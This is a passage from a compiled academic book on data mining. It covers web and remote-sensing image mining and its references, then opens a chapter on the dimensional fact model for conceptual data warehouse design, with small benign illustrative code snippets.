Once the search space reduction and the cluster characterisation by means of rules have been performed, descriptive metadata are stored in the database. These metadata represent the characteristics discovered and shared by images appearing in the same cluster, and they play an important role because they allow the user to navigate from the textual world towards the visual world, and conversely. The architecture presented in Figure 6 is well-suited to specific databases like fingerprint databases, face databases, and so forth. Indeed, image mining results depend on both the chosen clustering method and the estimated similarity quality. Without a real synergy between the application field, the considered visual features, their modeling, and the estimation of their similarity degree, the obtained descriptive metadata are not relevant enough to allow for a more interesting image database exploration. This architecture may also be adapted to general databases, and more particularly to the Web. As Web databases contain images of any domain, visual features are not very representative of particular concepts. This is the reason why only the concept extraction phase is performed: visual clusters are deduced from textual clusters, since the latter contain semantics by nature. The visual clusters obtained in this way are then characterised by means of rules. This adaptation of the proposed architecture may be a new way to navigate Web image databases. Web search engines are able to index only Web images having a particular tag related to the image caption. For example, if you search images of "Champs Elysées" using Google Image, the result contains only images whose caption corresponds to the specified keyword. Results are then ranked and presented to the user according to their relevance. Some metadata concerning these images are also added, for example, the format (gif, pdf, etc.), the colour, and so forth. But, if the user wants to retrieve images of the "Champs Elysées" by night and only in black and white, no results are given by the search engine. Thus, in order to improve Web image search, we should take into account both textual
information in the Web pages and visual information. Textual information can be the caption represented by a special tag, a text under the image, or free text in the Web page. In this last case, we can extract words from the paragraphs appearing before and after the image and search for frequent words to try to label the images. Some research has been done in this field, but integrating visual and textual descriptors to improve Web image search is still an unsolved problem.
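The frequent-word labelling idea can be sketched as follows; the text handling is deliberately naive, the stop-word list is tiny, and the example paragraphs are invented.

```python
import re
from collections import Counter

STOP_WORDS = {"the", "a", "an", "of", "and", "in", "on", "is", "to", "by"}

def candidate_labels(before_text, after_text, top_n=3):
    """Propose labels for an image from the paragraphs surrounding it."""
    words = re.findall(r"[a-zA-Z]{3,}", (before_text + " " + after_text).lower())
    words = [w for w in words if w not in STOP_WORDS]
    return [word for word, _ in Counter(words).most_common(top_n)]

# Example with hypothetical surrounding paragraphs.
before = "The Champs Elysees avenue is illuminated at night."
after = "Tourists walk along the Champs Elysees under the lights at night."
print(candidate_labels(before, after))   # ['champs', 'elysees', 'night']
```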
Multistrategical Mining of Remote Sensing Image Databases

In the last two decades, the Earth observation offer in the optical and radar fields has multiplied. With the new types of remote sensing images that have appeared since 1999 and the multiplication of hyperspectral sensors with several hundreds of bands, users are faced with a huge stream of images. These new types of images (HSR sensors like Quickbird or Orbview, hyperspectral sensors like AVIRIS, DAIS, CASI) provide a huge amount of data the user has to cope with in terms of spatial, spectral, and temporal resolution, depending on the objectives. In a context of city planning, it is necessary to support the identification, the localisation, and the formalisation of the urban elements (impervious surfaces, vegetation, water). Very often, the identification step requires some complementary aspects of a set of images and also ancillary data: seasonal, to discriminate mineral surfaces (which may or may not be agricultural zones); spectral, to supplement the range of the effective spectral responses; and finally, spatial, to take into account (1) the relationships within the studied area and (2) the adequacy of the pixel resolution in relation to the objects of interest (for example, irrigated natural zones). However, the lack of methods facilitating the selection of useful data, the improvement of knowledge extraction, and interpretation assistance adapted to the needs is still compelling.
Moreover, these methods do not allow for simultaneous and complementary approaches. Currently, the tendency is the development of object-oriented methods where each object represents a set of homogeneous pixels and is built around some elementary characteristics (spectral, geometrical) and the spatial relationships between objects (contextual texture and topological relations). Monoformalism does not allow for an unequivocal way to identify heterogeneous objects in an urban area. The formalism must be adapted to each scale of analysis. The Fodomust project2 proposes a multiformalist approach, taking into account the level of creation of the object and its use. This solution provides a complete data mining process allowing for information extraction without data fusion (if not needed). Due to the heterogeneity and the complexity of remote sensing images, the current methods of extraction and assistance to interpretation are not effective enough to take into account the complementarity of the data. In this project, it is argued that the problem lies in the need to use multiformalisation on several levels of abstraction according to image resolutions. Thus, the main aim of our project is to study and define methods and tools able to simultaneously use different knowledge databases to localise, identify, and characterise objects as being urban elements. These databases are associated with different sources (radiometric sensors, aerial and areal photographs, etc.), data representing the same object information but at different times or in various formats, scales, and file types (free texts, Web documents, taxonomies, etc.). This is the reason why a complete process of mining complex data sets, using expert knowledge for selecting, extracting, and interpreting remote sensing images, is proposed (Figure 7):
•	Data structuring and organising: The authors propose an architecture to structure and organise the set of data and metadata that are collected from the various physical data sources. They then design query mechanisms for image databases that exploit both low-level descriptors (date, location, etc.) and high-level semantic descriptors depicting the actual content of the images. This can allow us, on the one hand, to select and cluster data sources (by fusion, for instance) and, on the other hand, to eliminate from these sources the noise, redundancies, and nonrelevant information that are massively present in remote sensing images. When exploiting several sources of knowledge and images, data mining may also be performed directly on the raw data.
•	Object construction step: Image processing techniques (such as image segmentation, which changes the observed scale from pixels to regions) may greatly help to improve the
quality of identification and classification of objects contained in the considered images. Numerous segmentation techniques exist, and we propose to focus on the mathematical morphology principles. Indeed, mathematical morphology is not so often used in remote sensing, whereas it clearly presents several advantages in this application field, in particular, the possibility to characterise the different objects considering some of their properties such as shape, texture, size, topology, spatial relations, and so forth. The objectives are to elaborate multi-images morphological tools, to integrate knowledge into morphological analysis processes and to validate the methods over a large set of images.
•	Multistrategical classification and interpretation: The authors extend their multistrategy classification methods in order to be able to deal with data from different sources, and to take into account the multiformalism paradigm to which the different strategies can contribute different but complementary skills. Considering a unified representation, it will be possible to perform multistage learning corresponding to different abstraction levels. Moreover, this extension will result in the classification of heterogeneous objects and in semisupervised feature selection based on a coevolution of extractors. The results will make the understanding and the use of remote sensing information easier for general end users. User knowledge has to be integrated for operational guidance: it is worthwhile to use the available expert knowledge to simplify extraction and classification procedures.

Figure 7. Interpretation of remotely sensed image
These three distinct phases make it possible to extract the geographical objects from several images, to characterise them by a whole set of descriptors, to treat them using classification techniques according to multiple strategies, and to identify them on the basis of the ontology. The process functions in an iterative way, until a satisfactory identification of the objects has been reached. If such objects are neither in the ontology nor in the database, the latter will be enriched with them. The proposed process is under development; the first stage is the most advanced. An architecture has been developed to store the mass of image data as well as the geographical objects which will be built progressively. It is based on PostgreSQL and the associated PostGIS extension to manage spatial data. A conceptual data diagram, which reflects the structure of the geographical objects as well as the links which connect them, was defined as a preliminary. This made it possible to implement the database of
geographical objects. These objects, thus stored, will be useful both as a reference and for the identification process. In addition, an ontology of the geographical domain was defined to represent knowledge useful for the identification of the objects. This knowledge was acquired in two different ways: (1) by elicitation methods, in collaboration with geography photo-interpreters, to extract and formalise the discriminating attributes, and (2) by supervised machine learning (Sheeren, Quirin, Puissant, & Gançarski, 2006). The ontology was developed in OWL under Protégé 2000. The mechanism making it possible to associate the objects stored in the base with the concepts of the ontology is currently being studied. The principle is to extract an object from an image (by using a classifier) and to perform a matching between this object and the concepts of the ontology. According to the degree of similarity between the attributes of the object and the properties of the concepts, the object is labeled with the best-matching concept.
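Since the actual mechanism is still under study, the matching step can only be sketched; in the illustration below the attribute ranges, concept names, and scoring scheme are all invented.

```python
def match_concept(obj_attrs, ontology, threshold=0.5):
    """Label an extracted object with the best-matching ontology concept.

    obj_attrs: dict of attribute values, e.g. {"elongation": 0.2, "ndvi": 0.7}.
    ontology: dict concept -> dict of attribute -> (min, max) admissible range.
    """
    best_concept, best_score = None, 0.0
    for concept, properties in ontology.items():
        matched = sum(
            1 for attr, (lo, hi) in properties.items()
            if attr in obj_attrs and lo <= obj_attrs[attr] <= hi
        )
        score = matched / len(properties) if properties else 0.0
        if score > best_score:
            best_concept, best_score = concept, score
    return best_concept if best_score >= threshold else None

# Hypothetical fragment of a geographical ontology.
ontology = {
    "building": {"elongation": (0.0, 0.4), "ndvi": (0.0, 0.2)},
    "vegetation": {"ndvi": (0.5, 1.0)},
}
print(match_concept({"elongation": 0.2, "ndvi": 0.7}, ontology))  # vegetation
```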
CONCLUSION

Detection and recognition of semantic concepts from image databases is a major research challenge. A promising way could be the unsupervised mining of patterns. Patterns are recurrent, predictable occurrences of one or more entities that satisfy statistical, associative, or relational conditions. Together with the statistical aspect, we have presented some research related to the clustering methods applied to knowledge discovery from images in order to summarise image databases. But we did not find many uses of the pattern mining method when employed to discover associative rules among images or between
pixels from one or several images. This raises two questions. The first is: is trying to discover such relations from images relevant? Second, if the answer is yes, how can we make this research
effective? Nevertheless, we believe that such an approach can be very useful to highlight relations at the feature level as well as at a higher, semantic level. Patterns at the feature level may represent the occurrence of primitive concepts such as pixel clusters or relations between pixels. At the higher level, patterns may outline relations between semantic concepts and extracted clusters, or relations between semantic concepts themselves. Even if the clustering approach seems more mature than the approach related to association rule discovery, we are still faced with many challenges in both domains. The most important, in our opinion, is to find adequate representations of data: experiments show that using an image or a pixel directly as a transaction, or as an item in a transaction, is not efficient. More specific questions have to be answered, for example: How do we detect patterns starting from images with heterogeneous representations? How do we deal with patterns that may have relatively sparse occurrence frequencies? How do we take temporality into account? And, last but not least, how do we evaluate the quality of mining results given their unsupervised nature?
REFERENCES

Agrawal, R., Imielinski, T., & Swami, A. (1993). Mining association rules between sets of items in large databases. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1993), Washington, DC (pp. 207-216). ACM Press.
Agrawal, R., & Srikant, R. (1994). Fast algorithms for mining association rules. In J. Bocca, M. Jarke, & C. Zaniolo (Eds.), Proceedings of the 20th International Conference on Very Large Data Bases (VLDB 1994), Santiago, Chile (pp. 487-499). Morgan Kaufmann.
Agrawal, R., & Srikant, R. (1995). Mining sequential patterns. In Proceedings of the 11th International Conference on Data Engineering (ICDE 1995), Taipei, Taiwan (pp. 3-14). IEEE Computer Society Press. Ardizzone, E., Daurel, T., Maniscalco, U., & Rigotti, C. (2001). Extraction of association rules between low-level descriptors and semantic descriptors in an image database. In Proceedings of the 1st International Workshop on Multimedia Data and Document Engineering (MDDE 2001), Lyon, France. Baeza-Yates, R. A. (1992). Introduction to data structure and algorithms related to information retrieval. In Information retrieval: Data structure and algorithms (pp. 13-27). Prentice Hall. Ball, G., & Hall, D. (1967). A clustering technique for summarizing multi-variate data. Behavioral Sciences, 12, 153-155. Baril, X., & Bellahsene, Z. (2000). A view model for XML documents. In D. Patel, I. Choudhury, S. Patel, & S. de Cesare (Eds.), International Conference on Object Oriented Information Systems, London, United Kingdom (pp. 429–441). Bayardo, R. J. (1998). Efficiently mining long patterns from databases. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1998), Seattle, Washington (pp. 85-93). ACM Press. Bayardo, R. J., Agrawal, R., & Gunopulos, D. (1999). Constraint-based rule mining in large, dense databases. In Proceedings of the 15th International Conference on Data Engineering (ICDE 1999). Sydney, Australia (pp. 188-197). IEEE Computer Society. Ben Messaoud, R., Boussaïd, O., & Loudcher Rabaseda, S. (2006). A data mining-based OLAP aggregation of complex data: Application on XML documents. International Journal of Data Warehousing and Mining, 2(4), 1-26.
Berkhin, P. (2002). Survey of clustering data mining techniques. San Jose, CA: Accrue Software. Berners-Lee, T., Hendler, J., & Lassila, O. (2001). The Semantic Web. Scientific American, 284(5), 34-43.
Djeraba, C. (2003). Association and content-based retrieval. IEEE Transactions on Knowledge and Data Engineering, 15(1). Eakins, J. P. (2002). Towards intelligent image retrieval. Pattern Recognition, 35, 3-14.
Bouet, M., & Aufaure, M. A. (2006). New image retrieval principle: Image mining and visual ontology. In V. A. Petrushin & L. Khan (Eds.), Multimedia data mining and knowledge discovery. Springer.
Ester, M., Kriegel, H. P., Sander, J., & Xu, X. (1996). A density-based algorithm for discovering clusters in large spatial databases with noise. In Proceedings of the Second ACM SIGKDD, Portland, Oregon (pp. 226-231).
Boussaid, O., Ben Messaoud, R., Choquet, R., & Anthoard, S. (2006a). XWarehousing: An XML-based approach for warehousing complex data. In Proceedings of the 10th East-European Conference on Advances in Databases and Information Systems (ADBIS06), Thessaloniki, Greece (pp. 39-54). Lecture Notes in Computer Science 4152.
Fogel, D. (1994). An introduction to simulated evolutionary optimization. IEEE Transactions on Neural Networks, 5(1), 3-14.
Boussaid, O., Tanasescu, A., Bentayeb, F., & Darmont, J. (2006b). Integration and dimensional modelling approaches for complex data warehousing. Journal of Global Optimization, 37(4), 571-591.
Brin, S., Motwani, R., & Silverstein, C. (1997). Beyond market baskets: Generalizing association rules to correlations. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1997), Tucson, Arizona (pp. 265-276). ACM Press.
Chaudhuri, S., & Dayal, U. (1997). An overview of data warehousing and OLAP technology. SIGMOD Record, 26(1), 65-74.
Cheung, D. W. L., Han, J., Ng, V., & Wong, C. Y. (1996). Maintenance of discovered association rules in large databases: An incremental updating technique. In Proceedings of the 12th International Conference on Data Engineering (ICDE 1996), New Orleans, Louisiana (pp. 106-114). IEEE Computer Society Press.
Fukuda, T., Morimoto¸ Y., Morishita, S., & Tokuyama, T. (1996). Data mining using twodimensional optimized association rules: Scheme, algorithms, and visualization. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1996), Montreal, Quebec, Canada (pp. 13-23). ACM Press. Gançarski, P., & Wemmert , C. (2005). Collaborative multi-strategy classification: Application to per-pixel analysis of images. In Proceedings of the Sixth International Workshop on Multimedia Data Mining (ACM SIGKDD), Chicago, Illinois. Goethals, B. (2005). Frequent set mining. In The data mining and knowledge discovery handbook (pp. 377-397). Springer. Gomez-Perez, A., & Rojas, M. D. (1999). Ontological reengineering and reuse. In D. Fensel & R. Studer (Eds.), Proceedings of the 11th European Workshop on Knowledge Acquisition, Modeling and Management (EKAW’99), Germany (pp. 139-156). Lecture Notes in Artificial Intelligence 1621. Springer-Verlag. Grosky, W. I., Sreenath, D. V., & Fotouhi, F. (2002). Emergent semantics and the multimedia semantic Web. SIGMOD Record, 4.
Gruber, T. (1993). Toward principles for the design of ontologies used for knowledge sharing [Special issue]. International Journal of Human-Computer Studies.
Guha, S., Rastogi, R., & Shim, K. (1998). CURE: An efficient clustering algorithm for large databases. In Proceedings of the ACM SIGMOD International Conference on Management of Data (pp. 73-84).
Guha, S., Rastogi, R., & Shim, K. (2000). ROCK: A robust clustering algorithm for categorical attributes. Information Systems, 25(5), 345-366.
Han, J., Dong, G., & Yin, Y. (1999). Efficient mining of partial periodic patterns in time series database. In Proceedings of the 15th International Conference on Data Engineering (ICDE 1999), Sydney, Australia (pp. 106-115). IEEE Computer Society.
Han, J., & Fu, J. (1995). Discovery of multiple-level association rules from large databases. In Proceedings of the 21st International Conference on Very Large Data Bases (VLDB 1995), Zurich, Switzerland (pp. 420-431). Morgan Kaufmann.
Han, J., & Kamber, M. (2001). Data mining: Concepts and techniques (pp. 225-278, 395-449). San Francisco, CA: Morgan Kaufmann.
Han, E. H., Karypis, G., & Kumar, V. (1997). Scalable parallel data mining for association rules. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1997), Tucson, Arizona (pp. 277-288). ACM Press.
Jain, A. K., Murty, M. N., & Flynn, P. J. (1999). Data clustering: A review. ACM Computing Surveys, 31(3). Kamber, M., Han, J., & Chiang, J. (1997). Metarule-guided mining of multi-dimensional association rules using data cubes. In Proceedings of the 3rd International Conference on Knowledge Discovery and Data Mining (KDD 1997), Newport Beach, California (pp. 207-210). The AAAI Press. Karypis, G., Han, E., & Kumar, V. (1999). Chameleon: Hierarchical clustering using dynamic model. IEEE Computer, 32(8), 68-75. Kaufman, L., & Rousseew, P. (1990). Finding groups in data: An introduction to cluster analysis. New York: John Wiley & Sons. Kimball, R., & Ross, M. (2002). The data warehouse toolkit. John Wiley & Sons. Kleinberg, J. (2002). An impossibility theorem for clustering. Proceedings of the Conference on Advances in Neural Information Processing Systems, 15, 463-470. Klemettinen, M., Mannila, H., Ronkainen, P., Toivonen, H., & Verkamo, A. I. (1994). Finding interesting rules from large sets of discovered association rules. In Proceedings of the 3rd ACM International Conference on Information and Knowledge Management (CIKM 1994), Gaithersburg, Maryland (pp. 401-407). ACM Press. Kohonen, T. (1990). Self-organizing map. Proceeding of IEEE, 78(9), 1464-1480. Korn, F., Labrinidis, A., Kotidis, Y., & Faloutsos, C. (1998). Ratio rules: A new paradigm for fast, quantifiable data mining. In Proceedings of the 24th International Conference on Very Large Data Bases (VLDB 1998), New York, New York (pp. 582-593). Morgan Kaufmann. Lent, B., Swami, A. N., & Widom, J. (1997). Clustering association rules. In Proceedings of the 13th
International Conference on Data Engineering (ICDE 1997), Birmingham, United Kingdom (pp. 220-231). IEEE Computer Society. MacQueen, J. (1967). Some methods for classification and analysis of multivariate observations. In L. M. Le Cam & J. Neyman (Eds.), Proceedings of the Fifth Berkeley Symposium on Mathematical Statistics and Probability (vol. 1, pp. 281-297). Berkeley: University of California Press. Maiz, N., Boussaïd, O., & Bentayeb, F. (2006). Ontology-based mediation system. In Proceedings of the 13th ISPE International Conference on Concurrent Engineering: Research and Applications (CE 2006), Antibes, France (pp. 181-189). Mannila, H., Toivonen, H., & Verkamo, A. I. (1994). Efficient algorithms for discovering association rules. In U. Fayyad & R. Uthurusamy (Eds.), Proceedings of the AAAI Workshop Knowledge Discovery in Databases (KDD’94) (pp. 181-192). AAAI Press. Meo, R., Psaila, G., & Ceri, S. (1996). A new SQL-like operator for mining association rules. In Proceedings of the 22nd International Conference on Very Large Data Bases (VLDB 1996), Bombay, India (pp. 122-133). Morgan Kaufmann. Miller, R. J., & Yang, Y. (1997). Association rules over interval data. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1997), Tucson, Arizona (pp. 452-461). ACM Press. Mitchell, T. (1998). Machine learning. New York: McGraw-Hill. Morin, A., Kouomou Chopo, A., & Chauchat, J. H. (2005). Dimension reduction and clustering for query-by-example in huge image databases. In Proceedings of the 3rd World Conference on Computational Statistics and Data Analysis, Chypre. Nagy, G. (1968). State of the art in pattern recognition. Proceedings of the IEEE, 56, 836-862.
Nassis, V., Rajagopalapillai, R., Dillon, T. S., & Rahayu, W. (2005). Conceptual and systematic design approach for XML document warehouses. International Journal of Data Warehousing and Mining, 1(3), 63-87. Idea Group Inc. Ng, R. T., Lakshmanan, L. V. S., Han, J., & Pang, A. (1998). Exploratory mining and pruning optimizations of constrained associations rules. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1998), Seattle, Washington (pp. 13-24). ACM Press. Noy, N. F., Fergerson, R. W., & Musen, M. A. (2000). The knowledge model of Protege-2000: Combining interoperability and flexibility. In Proceedings of the Second International Conference on Knowledge Engineering and Knowledge Management. Ordonez, C., & Omiecinski, E. (1999). Discovering association rules based on image content. In Proceedings of the IEEE Advances in Digital Libraries Conference (ADL’99), Baltimore, Maryland (pp. 38-49). Ozden, B., Ramaswamy, S., & Silberschatz, A. (1998). Cyclic association rules. In Proceedings of the 14th International Conference on Data Engineering (ICDE 1998), Orlando, Florida (pp. 412-421). IEEE Computer Society. Park, J. S., Chen, M. S., & Yu, P. S. (1995). An effective hash-based algorithm for mining association rules. In Proceedings of the 1995 ACM SIGMOD International Conference on Management of Data Volume, San Jose, California. SIGMOD Record, 24(2), 175-186. ACM Press. Park, J. S., Chen, M. S., & Yu, P. S. (1995a). Efficient parallel data mining for association rules. In Proceedings of the 4th International Conference on Information and Knowledge Management (CIKM 1995), Baltimore, Maryland (pp. 31-36). ACM Press.
Pokorny, J. (2001). Modelling stars using XML. In DOLAP'01: Proceedings of the 4th ACM International Workshop on Data Warehousing and OLAP (pp. 24-31).
Ramaswamy, S., Mahajan, S., & Silberschatz, A. (1998). On the discovery of interesting patterns in association rules. In Proceedings of the 24th International Conference on Very Large Data Bases (VLDB 1998), New York City, New York (pp. 368-379). Morgan Kaufmann.
Rusu, L. I., Rahayu, J. W., & Taniar, D. (2005). A methodology for building XML data warehouses. International Journal of Data Warehousing and Mining, 1(2), 23-48. Idea Group Inc.
Savasere, A., Omiecinski, E., & Navathe, S. B. (1995). An efficient algorithm for mining association rules in large databases. In Proceedings of the 21st International Conference on Very Large Data Bases (VLDB 1995), Zurich, Switzerland (pp. 432-444). Morgan Kaufmann.
Sheeren, D., Quirin, A., Puissant, A., & Gançarski, P. (2006). Discovering rules with genetic algorithms to classify urban remotely sensed data. In Proceedings of the IEEE International Geoscience and Remote Sensing Symposium (IGARSS'06).
Srikant, R., & Agrawal¸ R. (1996). Mining quantitative association rules in large relational tables. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD 1996), Montreal, Quebec, Canada (pp. 1-12). ACM Press. Srikant, R., Vu, Q., & Agrawal, R. (1997). Mining association rules with item constraints. In Proceedings of the 3rd International Conference on Knowledge Discovery and Data Mining (KDD 1997), Newport Beach, California (pp. 67-73). The AAAI Press. Toivonen, H. (1996). Sampling large databases for association rules. In Proceedings of the 22nd International Conference on Very Large Data Bases (VLDB 1996), Bombay, India (pp. 134-145). Morgan Kaufmann. Tollari, S., Glotin, H., & Le Maitre, J. (2005). Enhancement of textual images classification using segmented visual contents for image search engine. Multimedia Tools and Applications, 25, 405-417). Troncy, R. (2003). Integration structure and semantics into audio-visual documents. In D. Fensel et al. (Eds.), Proceedings of ISWC2003 (pp. 566581). Lecture Notes in Computer Science 2870.
Silverstein, C., Brin, S., Motwani, R., & Ullman, J. (1998). Scalable techniques for mining causal structures. Data Mining Knowledge Discovery, 4(2-3), 163-192.
Wemmert, C., & Gançarski, P. (2002). A multiview voting method to combine unsupervised classifications. In Proceedings of the IASTED Artificial Intelligence and Applications Conference.
Simoff, S. J., Djeraba, C., & Zaïane, O. R. (2002). MDM/KDD2002: Multimedia data mining between promises and problems. ACM SIGKDD Explorations, 4(2).
Wiederhold, G. (1995). Mediation in information systems. ACM Computing Surveys, 27(2), 265-267.
Srikant, R., & Agrawal, R. (1995). Mining generalized association rules. In Proceedings of the 21st International Conference on Very Large Data Bases (VLDB 1995), Zurich, Switzerland (pp. 407-419). Morgan Kaufmann.
Wong, S. T. C., Hoo, K. S., Knowlton, R. C., Laxer, K. D., Cao, X., Hawkins, R. A., Dillon, W. P., & Arenson, R. L. (2002). Design and applications of a multimodality image data warehouse framework. The Journal of the American Medical Informatics Association, 9(3), 239-254.
Xu, R., & Wunsch, D. (2005). Survey of clustering algorithms. IEEE Transactions on Neural Networks, 16(3), 645-678.
Zaïane, O. R., Han, J., & Zhu, H. (2000). Mining recurrent items in multimedia with progressive resolution refinement. In Proceedings of the International Conference on Data Engineering (ICDE'00), San Diego, California.
Zhang, J., Hsu, W., & Lee, M. L. (2001). Image mining: Issues, frameworks and techniques. In Proceedings of the Second International Workshop on Multimedia Data Mining (MDM/KDD), San Francisco, California.
Zhang, T., Ramakrishman, R., & Livny, M. (1996). BIRCH: An efficient data clustering algorithm for very large databases. In Proceedings of the International Conference on Management of Data (pp. 103-114).
ENDNOTES

1.	In all the results, the colours have been randomly chosen by the authors.
2.	http://lsiit.u-strasbg.fr/afd/fodomust
This work was previously published in Successes and New Directions in Data Mining, edited by F. Masseglia, P. Poncelet, and M. Teisseire, pp. 187-212, copyright 2008 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 1.6
Conceptual Modeling Solutions for the Data Warehouse

Stefano Rizzi
DEIS - University of Bologna, Italy
ABSTRACT
In the context of data warehouse design, a basic role is played by conceptual modeling, that provides a higher level of abstraction in describing the warehousing process and architecture in all its aspects, aimed at achieving independence of implementation issues. This chapter focuses on a conceptual model called the DFM that suits the variety of modeling situations that may be encountered in real projects of small to large complexity. The aim of the chapter is to propose a comprehensive set of solutions for conceptual modeling according to the DFM and to give the designer a practical guide for applying them in the context of a design methodology. Besides the basic concepts of multidimensional modeling, the other issues discussed are descriptive and cross-dimension attributes; convergences; shared, incomplete, recursive, and dynamic hierarchies; multiple and optional arcs; and additivity.

INTRODUCTION
Operational databases are focused on recording transactions, thus they are prevalently characterized by an OLTP (online transaction processing) workload. Conversely, data warehouses (DWs) allow complex analysis of data aimed at decision support; the workload they support has completely different characteristics, and is widely known as OLAP (online analytical processing). Traditionally, OLAP applications are based on multidimensional modeling that intuitively represents data under the metaphor of a cube whose cells correspond to events that occurred in the business domain (Figure 1). Each event is quantified by a set of measures; each edge of the cube corresponds to a relevant dimension for analysis, typically associated to a hierarchy of attributes that further describe it. The multidimensional model has a twofold benefit. On the one hand, it is close to the way of thinking of data analyz-
Figure 1. The cube metaphor for multidimensional modeling
ers, who are used to the spreadsheet metaphor; therefore it helps users understand data. On the other hand, it supports performance improvement as its simple structure allows designers to predict the user intentions. Multidimensional modeling and OLAP workloads require specialized design techniques. In the context of design, a basic role is played by conceptual modeling that provides a higher level of abstraction in describing the warehousing process and architecture in all its aspects, aimed at achieving independence of implementation issues. Conceptual modeling is widely recognized to be the necessary foundation for building a database that is well-documented and fully satisfies the user requirements; usually, it relies on a graphical notation that facilitates writing, understanding, and managing conceptual schemata by both designers and users. Unfortunately, in the field of data warehousing there still is no consensus about a formalism for conceptual modeling (Sen & Sinha, 2005). The entity/relationship (E/R) model is widespread in the enterprises as a conceptual formalism to provide standard documentation for relational information systems, and a great deal of effort has been made to use E/R schemata as the input for designing nonrelational databases as well (Fahrner
& Vossen, 1995); nevertheless, as E/R is oriented to support queries that navigate associations between data rather than synthesize them, it is not well suited for data warehousing (Kimball, 1996). Actually, the E/R model has enough expressivity to represent most concepts necessary for modeling a DW; on the other hand, in its basic form, it is not able to properly emphasize the key aspects of the multidimensional model, so that its usage for DWs is expensive from the point of view of the graphical notation and not intuitive (Golfarelli, Maio, & Rizzi, 1998). Some designers claim to use star schemata for conceptual modeling. A star schema is the standard implementation of the multidimensional model on relational platforms; it is just a (denormalized) relational schema, so it merely defines a set of relations and integrity constraints. Using the star schema for conceptual modeling is like starting to build complex software by writing the code, without the support of any static, functional, or dynamic model, which typically leads to very poor results from the points of view of adherence to user requirements, of maintenance, and of reuse. For all these reasons, in the last few years the research literature has proposed several original approaches for modeling a DW, some based on
extensions of E/R, some on extensions of UML. This chapter focuses on an ad hoc conceptual model, the dimensional fact model (DFM), that was first proposed in Golfarelli et al. (1998) and continuously enriched and refined during the following years in order to optimally suit the variety of modeling situations that may be encountered in real projects of small to large complexity. The aim of the chapter is to propose a comprehensive set of solutions for conceptual modeling according to the DFM and to give a practical guide for applying them in the context of a design methodology. Besides the basic concepts of multidimensional modeling, namely facts, dimensions, measures, and hierarchies, the other issues discussed are descriptive and cross-dimension attributes; convergences; shared, incomplete, recursive, and dynamic hierarchies; multiple and optional arcs; and additivity. After reviewing the related literature in the next section, in the third and fourth sections, we introduce the constructs of DFM for basic and advanced modeling, respectively. Then, in the fifth section we briefly discuss the different methodological approaches to conceptual design. Finally, in the sixth section we outline the open issues in conceptual modeling, and in the last section we draw the conclusions.
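Before turning to the literature, a toy illustration of the cube metaphor and of aggregation along a hierarchy may help fix ideas; the data and the dimension names below are invented and are not part of the chapter's running example.

```python
from collections import defaultdict

# Cells of a tiny sales cube: (product, city, date) -> measure (quantity sold).
cube = {
    ("shirt", "Rome",  "2007-01-02"): 10,
    ("shirt", "Rome",  "2007-01-15"): 6,
    ("shoes", "Milan", "2007-02-10"): 7,
}

# A fragment of the date hierarchy: each day rolls up to its month.
def month(day):
    return day[:7]

# Roll-up: aggregate the cells along the date hierarchy (day to month).
rollup = defaultdict(int)
for (product, city, day), qty in cube.items():
    rollup[(product, city, month(day))] += qty

print(dict(rollup))
# {('shirt', 'Rome', '2007-01'): 16, ('shoes', 'Milan', '2007-02'): 7}
```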
RELATED LITERATURE

In the context of data warehousing, the literature proposed several approaches to multidimensional
modeling. Some of them have no graphical support and are aimed at establishing a formal foundation for representing cubes and hierarchies as well as an algebra for querying them (Agrawal, Gupta, & Sarawagi, 1995; Cabibbo & Torlone, 1998; Datta & Thomas, 1997; Franconi & Kamble, 2004a; Gyssens & Lakshmanan, 1997; Li & Wang, 1996; Pedersen & Jensen, 1999; Vassiliadis, 1998); since we believe that a distinguishing feature of conceptual models is that of providing a graphical support to be easily understood by both designers and users when discussing and validating requirements, we will not discuss them. The approaches to “strict” conceptual modeling for DWs devised so far are summarized in Table 1. For each model, the table shows if it is associated to some method for conceptual design and if it is based on E/R, is object-oriented, or is an ad hoc model. The discussion about whether E/R-based, object-oriented, or ad hoc models are preferable is controversial. Some claim that E/R extensions should be adopted since (1) E/R has been tested for years; (2) designers are familiar with E/R; (3) E/R has proven flexible and powerful enough to adapt to a variety of application domains; and (4) several important research results were obtained for the E/R (Sapia, Blaschka, Hofling, & Dinter, 1998; Tryfona, Busborg, & Borch Christiansen, 1999). On the other hand, advocates of object-oriented models argue that (1) they are more expressive and better represent static and dynamic properties of information systems; (2) they provide powerful mechanisms for expressing requirements and
Table 1. Approaches to conceptual modeling
no method: E/R extension: Franconi and Kamble (2004b), Sapia et al. (1998), Tryfona et al. (1999); object-oriented: Abelló et al. (2002), Nguyen, Tjoa, and Wagner (2000); ad hoc: Tsois et al. (2001)
method: E/R extension: none; object-oriented: Luján-Mora et al. (2002); ad hoc: Golfarelli et al. (1998), Hüsemann et al. (2000)
constraints; (3) object-orientation is currently the dominant trend in data modeling; and (4) UML, in particular, is a standard and is naturally extensible (Abelló, Samos, & Saltor, 2002; Luján-Mora, Trujillo, & Song, 2002). Finally, we believe that ad hoc models compensate for designers' lack of familiarity with them by the fact that (1) they achieve better notational economy; (2) they give proper emphasis to the peculiarities of the multidimensional model; and thus (3) they are more intuitive and readable by nonexpert users. In particular, they can model some constraints related to functional dependencies (e.g., convergences and cross-dimensional attributes) in a simpler way than UML, which requires the use of formal expressions written, for instance, in OCL.
A comparison of the different models done by Tsois, Karayannidis, and Sellis (2001) pointed out that, abstracting from their graphical form, the core expressivity is similar. In confirmation of this, we show in Figure 2 how the same simple fact could be modeled through an E/R based, an object-oriented, and an ad hoc approach.
THE DIMENSIONAL FACT MODEL: BASIC MODELING

In this chapter we focus on an ad hoc model called the dimensional fact model. The DFM is a graphical conceptual model, specifically devised for multidimensional modeling, aimed at:
Figure 2. The SALE fact modeled through a starER (Sapia et al., 1998), a UML class diagram (LujánMora et al., 2002), and a fact schema (Hüsemann, Lechtenbörger, & Vossen, 2000)
•	Effectively supporting conceptual design
•	Providing an environment on which user queries can be intuitively expressed
